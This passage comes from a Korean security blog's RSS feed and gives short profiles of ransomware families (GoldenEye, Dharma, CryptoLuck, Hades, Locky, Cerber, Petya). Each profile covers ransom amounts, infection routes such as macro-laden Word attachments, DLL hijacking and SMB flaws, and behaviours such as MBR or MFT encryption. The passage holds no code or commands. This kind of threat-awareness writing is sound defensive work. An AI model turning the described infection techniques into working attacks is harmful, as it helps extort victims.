this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FRySK9%2FbtqDoT9Oxsj%2FJhuavSKIknzSeSfkdIQbv0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/9E4qB/btqDn2fhcPt/oyJPlU4p8EUTGqPwCRkt60/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/9E4qB/btqDn2fhcPt/oyJPlU4p8EUTGqPwCRkt60/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/9E4qB/btqDn2fhcPt/oyJPlU4p8EUTGqPwCRkt60/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FRySK9%2FbtqDoT9Oxsj%2FJhuavSKIknzSeSfkdIQbv0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;GoldenEye Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 1.33284506 BTC(현재 2020.04.12 기준 약 1,100만원)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;이메일의 첨부파일을 통해 감염&lt;/b&gt;&lt;/span&gt;이 되고, 재부팅이 일어나면 검은 화면이 출력된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- MBR 영역을 감염시켜 정상 부팅이 되지 않아 치료가 어려울 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 해외직구를 이용하는 사용자는 주의가 필요하다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FkSabb%2FbtqDnxNaltP%2FBK39SL8hBF0I77agsLjqD0%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/banIKW/btqDpfE0fKd/9w694oUNXh3Ynzcg9TJCR1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/banIKW/btqDpfE0fKd/9w694oUNXh3Ynzcg9TJCR1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/banIKW/btqDpfE0fKd/9w694oUNXh3Ynzcg9TJCR1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FkSabb%2FbtqDnxNaltP%2FBK39SL8hBF0I77agsLjqD0%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;Dharma Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 초기엔 2 BTC, 시간이 지날수록 추가 요구(현재 2020.04.12 기준 약 1,600만원)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Crysis Ransomware의 변종이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염되면 모든 확장자를 가리지 않고 암호화해 확장자를 '.[worm01@india.com].dharma'로 변경한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 컴퓨터가 실행되는데 필요한 파일은 예외 처리하고 암호화하며, 암호화 이후엔 원본파일을 삭제한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복호화 비용은 바로 알려주지 않고, 이메일을 보내도록 요구한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Crysis Ransomware의 Encrypt Key는 BleepingComputer Forum에 User crss7777이 공개했다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbJKCDv%2FbtqDlknHI6d%2F1d29kgNhBz6RwRvFshl1j0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dl4Qst/btqDljo0zVz/zrw5VpF9HQdsEDUN1BEBZ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dl4Qst/btqDljo0zVz/zrw5VpF9HQdsEDUN1BEBZ0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dl4Qst/btqDljo0zVz/zrw5VpF9HQdsEDUN1BEBZ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbJKCDv%2FbtqDlknHI6d%2F1d29kgNhBz6RwRvFshl1j0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;CryptoLuck Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 2.1 BTC(현재 2020.04.12 기준 1,700만원)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;구글 업데이트 파일의 DLL 하이재킹 취약점을 이용하여 악성 랜섬웨어 DLL 파일을 로드해 실행&lt;/b&gt;&lt;/span&gt;시킨다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 파일을 암호화하고 확장자를 '.[8자리 임의문자]_luck'으로 변경한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 72시간 이내에 복구 비용을 지불하지 않으면 복구가 불가능하다고 협박을 한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FEofi5%2FbtqDkAdqtub%2Fkkkppt3dZkg3nozj2WvC3k%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cD2EEP/btqDlOhZjXF/fl14SLPMTSJUCuzEey9Rck/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cD2EEP/btqDlOhZjXF/fl14SLPMTSJUCuzEey9Rck/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cD2EEP/btqDlOhZjXF/fl14SLPMTSJUCuzEey9Rck/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FEofi5%2FbtqDkAdqtub%2Fkkkppt3dZkg3nozj2WvC3k%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;Hades Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;이메일을 통해 유포&lt;/b&gt;&lt;/span&gt;가 된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염 시 파일 암호화, 확장자를 '.~HL(5자리 랜덤)'으로 변경한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 헬프데스크를 운영해 복호화에 대한 사용자들의 질문에 대응을 하는 특징을 가지고 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2Fcd1vqs%2FbtqDoTor3eY%2FKdUMowbvKWiq37szAJG7B0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/sqqZ8/btqDpgw8IhG/MgYd4ldQqvpskZHgmXsSnK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/sqqZ8/btqDpgw8IhG/MgYd4ldQqvpskZHgmXsSnK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/sqqZ8/btqDpgw8IhG/MgYd4ldQqvpskZHgmXsSnK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2Fcd1vqs%2FbtqDoTor3eY%2FKdUMowbvKWiq37szAJG7B0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FcLM5yn%2FbtqDmmehOET%2FSAHkNKr0Fe12HZfrH9qgF1%2Fimg.webp&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bijyPu/btqDmVnp74U/NFn2NKGwyxIk7lhRJk8y00/img.webp&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bijyPu/btqDmVnp74U/NFn2NKGwyxIk7lhRJk8y00/img.webp&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bijyPu/btqDmVnp74U/NFn2NKGwyxIk7lhRJk8y00/img.webp&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FcLM5yn%2FbtqDmmehOET%2FSAHkNKr0Fe12HZfrH9qgF1%2Fimg.webp&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;Locky Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 0.5 BTC(현재 2020.04.12 기준 400만원)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;이메일 첨부파일을 통해 추가 다운로드 형태로 유포&lt;/b&gt;&lt;/span&gt;한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 시스템 언어가 러시아어인 경우에는 악성코드가 동작하지 않는다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 국내 많은 피해자를 양산했다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 악성 매크로를 갖춘 워드 파일로 퍼진다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 문서를 열면 뒤죽박죽 섞인 내용이 보인다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 이를 정렬하면 매크로를 실행하라는 문구가 나온다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 매크로를 실행하면 록키가 Temp 폴더에 다운로드된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Locky의 1차 변종인 Zepto, 2차 변종인 Odin으로 계속 패치가 되고 있는 상황이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbDY8YE%2FbtqDnxTWtE2%2Fcn4DB2jLxsnxIsl6aND7uk%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b7zP4x/btqDoTvpMEl/wsEgwVnnIzHk7EtZKtlIjK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b7zP4x/btqDoTvpMEl/wsEgwVnnIzHk7EtZKtlIjK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b7zP4x/btqDoTvpMEl/wsEgwVnnIzHk7EtZKtlIjK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbDY8YE%2FbtqDnxTWtE2%2Fcn4DB2jLxsnxIsl6aND7uk%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;Cerber Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : First - 0.75 BTC(현재 2020.04.12 기준 600만원), Second - 1.5 BTC&amp;nbsp;&lt;span style=&quot;color: #333333;&quot;&gt;(현재 2020.04.12 기준 1,200만원)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;말하는 랜섬웨어&lt;/b&gt;&lt;/span&gt;이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염 시 파일 암호화, 10자리 랜덤 파일명 및 '.cerber' 확장자로 변경이 된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- html, txt, vbs 파일을 생성해 감염사실을 알린다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- vbs 파일에서 &quot;Attention! Attention! Attention! Your documents, photos, databases and other important files have been encrypted!&quot;라는 음성이 나온다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 암호화된 파일은 Cerber Decrypter 프로그램을 구매하면 복구할 수 있다고 안내한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 먼저 0.75 BTC를 요구하고, 일주일 후에 가격을 두배로 올린다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Cerber Ransomware는 공격하고 싶은 사람들이 개발자로부터 랜섬웨어를 대여받아 공격을 하고, 수익의 일부를 개발자에게 때어주는 서비스형 랜섬웨어 구조이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FFZpPZ%2FbtqDnx0McGv%2FgFBRrTNi5CYL9hNrGTaaDK%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bkSCEk/btqDlOhZlfO/k3giNW2R1cMuO3zmTA03Zk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bkSCEk/btqDlOhZlfO/k3giNW2R1cMuO3zmTA03Zk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bkSCEk/btqDlOhZlfO/k3giNW2R1cMuO3zmTA03Zk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FFZpPZ%2FbtqDnx0McGv%2FgFBRrTNi5CYL9hNrGTaaDK%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FcSgzKZ%2FbtqDnxmbLNz%2FcUcMLhv7aiS3Jm9SjIQ2x0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yvbAs/btqDmWT92bU/c9p3vjIXZk7ZJ3TsrJJIyK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yvbAs/btqDmWT92bU/c9p3vjIXZk7ZJ3TsrJJIyK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yvbAs/btqDmWT92bU/c9p3vjIXZk7ZJ3TsrJJIyK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FcSgzKZ%2FbtqDnxmbLNz%2FcUcMLhv7aiS3Jm9SjIQ2x0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;Petya Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 당시 300달러 상당의 BTC&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- WannaCry Ransomware와 같이&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;SMB 취약점&lt;/b&gt;&lt;/span&gt;을 이용했다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 컴퓨터의 파일을 암호화하고, 복호화 키를 제공하는 대가로 금전을 요구한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 정확히 말하면 컴퓨터 안에 있는 파일을 암호화하는게 아니라 NTFS Master File Table(MFT)를 암호화한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Petya Ransomware에 감염되면 정상적으로 PC를 부팅하는 것도 불가능하다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- MBR Locker 형식의 Ransomware이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 2016.03.29 많이 감염되었다.&lt;/span&gt;&lt;/p&gt;</description>
      <category>Project/Ransomware</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/22</guid>
      <comments>https://rgb4.tistory.com/22#entry22comment</comments>
      <pubDate>Sun, 12 Apr 2020 21:38:18 +0900</pubDate>
    </item>
    <item>
      <title>[악성코드분석] Petya 랜섬웨어 분석 - #1 개요</title>
      <link>https://rgb4.tistory.com/21</link>
      <description>&lt;p&gt;원 게시물 :&amp;nbsp;&lt;a href=&quot;https://blog.system32.kr/178&quot;&gt;https://blog.system32.kr/178&lt;/a&gt;&lt;/p&gt;
